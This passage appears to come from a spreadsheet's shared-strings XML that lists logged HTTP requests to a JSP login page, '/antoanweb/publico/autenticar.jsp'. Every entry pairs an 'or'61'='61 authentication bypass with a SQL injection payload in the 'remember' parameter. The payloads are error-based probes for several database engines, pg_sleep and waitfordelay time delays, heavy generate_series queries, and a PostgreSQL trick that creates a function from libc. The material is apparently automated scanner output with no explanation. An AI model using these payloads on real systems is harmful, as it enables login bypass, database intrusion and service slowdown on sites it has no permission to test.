    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-3258))or1837=(ascii_char(58)||ascii_char(114)||ascii_char(116)||ascii_char(109)||ascii_char(58)||(selectcase1837when1837then1else0endfromrdb$database)||ascii_char(58)||ascii_char(101)||ascii_char(107)||ascii_char(121)||ascii_char(58))and((456=456&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-9005&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-7790)))or1837=(ascii_char(58)||ascii_char(114)||ascii_char(116)||ascii_char(109)||ascii_char(58)||(selectcase1837when1837then1else0endfromrdb$database)||ascii_char(58)||ascii_char(101)||ascii_char(107)||ascii_char(121)||ascii_char(58))and(((4282=4282&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-2287or1837=(ascii_char(58)||ascii_char(114)||ascii_char(116)||ascii_char(109)||ascii_char(58)||(selectcase1837when1837then1else0endfromrdb$database)||ascii_char(58)||ascii_char(101)||ascii_char(107)||ascii_char(121)||ascii_char(58))&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-2445&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-965')or1837=(ascii_char(58)||ascii_char(114)||ascii_char(116)||ascii_char(109)||ascii_char(58)||(selectcase1837when1837then1else0endfromrdb$database)||ascii_char(58)||ascii_char(101)||ascii_char(107)||ascii_char(121)||ascii_char(58))and('wxiq'='wxiq&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-3264&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-3795'))or1837=(ascii_char(58)||ascii_char(114)||ascii_char(116)||ascii_char(109)||ascii_char(58)||(selectcase1837when1837then1else0endfromrdb$database)||ascii_char(58)||ascii_char(101)||ascii_char(107)||ascii_char(121)||ascii_char(58))and(('grkw'='grkw&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-6860&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-454')))or1837=(ascii_char(58)||ascii_char(114)||ascii_char(116)||ascii_char(109)||ascii_char(58)||(selectcase1837when1837then1else0endfromrdb$database)||ascii_char(58)||ascii_char(101)||ascii_char(107)||ascii_char(121)||ascii_char(58))and((('rwmm'='rwmm&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-4432&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-9858'or1837=(ascii_char(58)||ascii_char(114)||ascii_char(116)||ascii_char(109)||ascii_char(58)||(selectcase1837when1837then1else0endfromrdb$database)||ascii_char(58)||ascii_char(101)||ascii_char(107)||ascii_char(121)||ascii_char(58))and'davu'='davu&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-3625&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-6889')or1837=(ascii_char(58)||ascii_char(114)||ascii_char(116)||ascii_char(109)||ascii_char(58)||(selectcase1837when1837then1else0endfromrdb$database)||ascii_char(58)||ascii_char(101)||ascii_char(107)||ascii_char(121)||ascii_char(58))and('qmkt'like'qmkt&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-5549&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-3687'))or1837=(ascii_char(58)||ascii_char(114)||ascii_char(116)||ascii_char(109)||ascii_char(58)||(selectcase1837when1837then1else0endfromrdb$database)||ascii_char(58)||ascii_char(101)||ascii_char(107)||ascii_char(121)||ascii_char(58))and(('hday'like'hday&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-7551&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-1261')))or1837=(ascii_char(58)||ascii_char(114)||ascii_char(116)||ascii_char(109)||ascii_char(58)||(selectcase1837when1837then1else0endfromrdb$database)||ascii_char(58)||ascii_char(101)||ascii_char(107)||ascii_char(121)||ascii_char(58))and((('daww'like'daww&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-6635&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-6445'or1837=(ascii_char(58)||ascii_char(114)||ascii_char(116)||ascii_char(109)||ascii_char(58)||(selectcase1837when1837then1else0endfromrdb$database)||ascii_char(58)||ascii_char(101)||ascii_char(107)||ascii_char(121)||ascii_char(58))and'pbzq'like'pbzq&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-7313&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-1231")or1837=(ascii_char(58)||ascii_char(114)||ascii_char(116)||ascii_char(109)||ascii_char(58)||(selectcase1837when1837then1else0endfromrdb$database)||ascii_char(58)||ascii_char(101)||ascii_char(107)||ascii_char(121)||ascii_char(58))and("oxog"="oxog&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-3817&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-5724"))or1837=(ascii_char(58)||ascii_char(114)||ascii_char(116)||ascii_char(109)||ascii_char(58)||(selectcase1837when1837then1else0endfromrdb$database)||ascii_char(58)||ascii_char(101)||ascii_char(107)||ascii_char(121)||ascii_char(58))and(("ajgk"="ajgk&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-511&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-8514")))or1837=(ascii_char(58)||ascii_char(114)||ascii_char(116)||ascii_char(109)||ascii_char(58)||(selectcase1837when1837then1else0endfromrdb$database)||ascii_char(58)||ascii_char(101)||ascii_char(107)||ascii_char(121)||ascii_char(58))and((("hgga"="hgga&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-4225&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-8526"or1837=(ascii_char(58)||ascii_char(114)||ascii_char(116)||ascii_char(109)||ascii_char(58)||(selectcase1837when1837then1else0endfromrdb$database)||ascii_char(58)||ascii_char(101)||ascii_char(107)||ascii_char(121)||ascii_char(58))and"jepi"="jepi&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-3807&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-1542")or1837=(ascii_char(58)||ascii_char(114)||ascii_char(116)||ascii_char(109)||ascii_char(58)||(selectcase1837when1837then1else0endfromrdb$database)||ascii_char(58)||ascii_char(101)||ascii_char(107)||ascii_char(121)||ascii_char(58))and("sepg"like"sepg&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-8723&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-6486"))or1837=(ascii_char(58)||ascii_char(114)||ascii_char(116)||ascii_char(109)||ascii_char(58)||(selectcase1837when1837then1else0endfromrdb$database)||ascii_char(58)||ascii_char(101)||ascii_char(107)||ascii_char(121)||ascii_char(58))and(("rfws"like"rfws&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-89&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-1931")))or1837=(ascii_char(58)||ascii_char(114)||ascii_char(116)||ascii_char(109)||ascii_char(58)||(selectcase1837when1837then1else0endfromrdb$database)||ascii_char(58)||ascii_char(101)||ascii_char(107)||ascii_char(121)||ascii_char(58))and((("tsup"like"tsup&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-8002&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-4150"or1837=(ascii_char(58)||ascii_char(114)||ascii_char(116)||ascii_char(109)||ascii_char(58)||(selectcase1837when1837then1else0endfromrdb$database)||ascii_char(58)||ascii_char(101)||ascii_char(107)||ascii_char(121)||ascii_char(58))and"mhfr"like"mhfr&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=(cast(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(9409=9409)then1else0end))::text||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)asnumeric))&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=(convert(int,(char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(3626=3626)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58))))&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=(selectupper(xmltype(chr(60)||chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(replace((select(casewhen(0=0)then1else0end)fromdual),chr(32),chr(58)||chr(108)||chr(58)))||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)||chr(62)))fromdual)&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=(select122=(ascii_char(58)||ascii_char(114)||ascii_char(116)||ascii_char(109)||ascii_char(58)||(selectcase122when122then1else0endfromrdb$database)||ascii_char(58)||ascii_char(101)||ascii_char(107)||ascii_char(121)||ascii_char(58)))&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=,(cast(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(7277=7277)then1else0end))::text||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)asnumeric))&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=,(convert(int,(char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(104=104)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58))))&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=,(selectupper(xmltype(chr(60)||chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(replace((select(casewhen(7094=7094)then1else0end)fromdual),chr(32),chr(58)||chr(108)||chr(58)))||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)||chr(62)))fromdual)&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=);selectpg_sleep(5);--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=');selectpg_sleep(5);--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=';selectpg_sleep(5);--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=";selectpg_sleep(5);--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=);selectpg_sleep(5);--and(2326=2326&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=));selectpg_sleep(5);--and((4421=4421&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)));selectpg_sleep(5);--and(((144=144&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=;selectpg_sleep(5);--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=');selectpg_sleep(5);--and('zgno'='zgno&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='));selectpg_sleep(5);--and(('sqyk'='sqyk&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')));selectpg_sleep(5);--and((('utpy'='utpy&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=';selectpg_sleep(5);--and'jcxw'='jcxw&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=');selectpg_sleep(5);--and('wjoh'like'wjoh&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='));selectpg_sleep(5);--and(('qrhe'like'qrhe&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')));selectpg_sleep(5);--and((('uiev'like'uiev&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=';selectpg_sleep(5);--and'idjm'like'idjm&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=");selectpg_sleep(5);--and("kppw"="kppw&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="));selectpg_sleep(5);--and(("zgoh"="zgoh&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")));selectpg_sleep(5);--and((("ofer"="ofer&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=";selectpg_sleep(5);--and"bqaw"="bqaw&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=");selectpg_sleep(5);--and("xyca"like"xyca&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="));selectpg_sleep(5);--and(("aklf"like"aklf&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")));selectpg_sleep(5);--and((("oftr"like"oftr&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=";selectpg_sleep(5);--and"lbre"like"lbre&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=);selectcount(*)fromgenerate_series(1,5000000);--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=');selectcount(*)fromgenerate_series(1,5000000);--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=';selectcount(*)fromgenerate_series(1,5000000);--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=";selectcount(*)fromgenerate_series(1,5000000);--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=);selectcount(*)fromgenerate_series(1,5000000);--and(4278=4278&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=));selectcount(*)fromgenerate_series(1,5000000);--and((2699=2699&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)));selectcount(*)fromgenerate_series(1,5000000);--and(((3352=3352&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=;selectcount(*)fromgenerate_series(1,5000000);--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=');selectcount(*)fromgenerate_series(1,5000000);--and('xgeu'='xgeu&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='));selectcount(*)fromgenerate_series(1,5000000);--and(('ygrv'='ygrv&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')));selectcount(*)fromgenerate_series(1,5000000);--and((('mgji'='mgji&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=';selectcount(*)fromgenerate_series(1,5000000);--and'lcxl'='lcxl&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=');selectcount(*)fromgenerate_series(1,5000000);--and('wgcc'like'wgcc&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='));selectcount(*)fromgenerate_series(1,5000000);--and(('nyxq'like'nyxq&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')));selectcount(*)fromgenerate_series(1,5000000);--and((('sjba'like'sjba&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=';selectcount(*)fromgenerate_series(1,5000000);--and'lmxa'like'lmxa&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=");selectcount(*)fromgenerate_series(1,5000000);--and("tkzb"="tkzb&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="));selectcount(*)fromgenerate_series(1,5000000);--and(("wdyk"="wdyk&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")));selectcount(*)fromgenerate_series(1,5000000);--and((("mcmi"="mcmi&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=";selectcount(*)fromgenerate_series(1,5000000);--and"fhyy"="fhyy&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=");selectcount(*)fromgenerate_series(1,5000000);--and("bxoz"like"bxoz&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="));selectcount(*)fromgenerate_series(1,5000000);--and(("kmip"like"kmip&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")));selectcount(*)fromgenerate_series(1,5000000);--and((("xybs"like"xybs&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=";selectcount(*)fromgenerate_series(1,5000000);--and"ktao"like"ktao&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=);createorreplacefunctionsleep(int)returnsintas'/lib/libc.so.6','sleep'language'c'strict;selectsleep(5);--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=');createorreplacefunctionsleep(int)returnsintas'/lib/libc.so.6','sleep'language'c'strict;selectsleep(5);--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=';createorreplacefunctionsleep(int)returnsintas'/lib/libc.so.6','sleep'language'c'strict;selectsleep(5);--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=";createorreplacefunctionsleep(int)returnsintas'/lib/libc.so.6','sleep'language'c'strict;selectsleep(5);--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=);createorreplacefunctionsleep(int)returnsintas'/lib/libc.so.6','sleep'language'c'strict;selectsleep(5);--and(73=73&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=));createorreplacefunctionsleep(int)returnsintas'/lib/libc.so.6','sleep'language'c'strict;selectsleep(5);--and((1924=1924&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)));createorreplacefunctionsleep(int)returnsintas'/lib/libc.so.6','sleep'language'c'strict;selectsleep(5);--and(((8384=8384&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=;createorreplacefunctionsleep(int)returnsintas'/lib/libc.so.6','sleep'language'c'strict;selectsleep(5);--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=');createorreplacefunctionsleep(int)returnsintas'/lib/libc.so.6','sleep'language'c'strict;selectsleep(5);--and('hwae'='hwae&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='));createorreplacefunctionsleep(int)returnsintas'/lib/libc.so.6','sleep'language'c'strict;selectsleep(5);--and(('tpda'='tpda&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')));createorreplacefunctionsleep(int)returnsintas'/lib/libc.so.6','sleep'language'c'strict;selectsleep(5);--and((('zrqn'='zrqn&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=';createorreplacefunctionsleep(int)returnsintas'/lib/libc.so.6','sleep'language'c'strict;selectsleep(5);--and'uqtb'='uqtb&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=');createorreplacefunctionsleep(int)returnsintas'/lib/libc.so.6','sleep'language'c'strict;selectsleep(5);--and('yadr'like'yadr&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='));createorreplacefunctionsleep(int)returnsintas'/lib/libc.so.6','sleep'language'c'strict;selectsleep(5);--and(('oszi'like'oszi&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')));createorreplacefunctionsleep(int)returnsintas'/lib/libc.so.6','sleep'language'c'strict;selectsleep(5);--and((('cpfh'like'cpfh&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=';createorreplacefunctionsleep(int)returnsintas'/lib/libc.so.6','sleep'language'c'strict;selectsleep(5);--and'azdc'like'azdc&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=");createorreplacefunctionsleep(int)returnsintas'/lib/libc.so.6','sleep'language'c'strict;selectsleep(5);--and("bdtd"="bdtd&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="));createorreplacefunctionsleep(int)returnsintas'/lib/libc.so.6','sleep'language'c'strict;selectsleep(5);--and(("wqhz"="wqhz&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")));createorreplacefunctionsleep(int)returnsintas'/lib/libc.so.6','sleep'language'c'strict;selectsleep(5);--and((("taoj"="taoj&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=";createorreplacefunctionsleep(int)returnsintas'/lib/libc.so.6','sleep'language'c'strict;selectsleep(5);--and"xsrc"="xsrc&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=");createorreplacefunctionsleep(int)returnsintas'/lib/libc.so.6','sleep'language'c'strict;selectsleep(5);--and("nbgw"like"nbgw&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="));createorreplacefunctionsleep(int)returnsintas'/lib/libc.so.6','sleep'language'c'strict;selectsleep(5);--and(("zwdr"like"zwdr&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")));createorreplacefunctionsleep(int)returnsintas'/lib/libc.so.6','sleep'language'c'strict;selectsleep(5);--and((("gyhu"like"gyhu&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=";createorreplacefunctionsleep(int)returnsintas'/lib/libc.so.6','sleep'language'c'strict;selectsleep(5);--and"xlnj"like"xlnj&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=);waitfordelay'0:0:5';--&amp;modo=entrar</t>
  </si>
  <si>
